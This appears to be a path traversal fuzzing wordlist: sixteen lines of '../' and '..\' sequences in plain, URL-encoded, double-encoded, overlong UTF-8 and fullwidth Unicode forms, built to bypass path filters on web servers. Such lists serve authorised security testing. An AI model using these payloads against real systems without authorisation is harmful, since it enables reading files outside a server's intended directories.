..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\
../../../../../../../../../../../../../../../../../../../../../../../../
..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/
…/./…/./…/./…/./…/./…/./…/./…/./…/./…/./…/./…/./
...\.\...\.\...\.\...\.\...\.\...\.\...\.\...\.\...\.\...\.\...\.\...\.\
..//..//..//..//..//..//..//..//..//..//..//..//..//..//..//..//..//..//..//..//
..\../..\../..\../..\../..\../..\../..\../..\../..\../..\../..\../..\../..\../..\../
\.....\\\.....\\\.....\\\.....\\\.....\\\.....\\\.....\\\.....\\\.....\\\.....\\
/..\..\..\..\..\..\..\..\..\..\..\..\..\..\
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f
..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c/
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af
%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215
%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216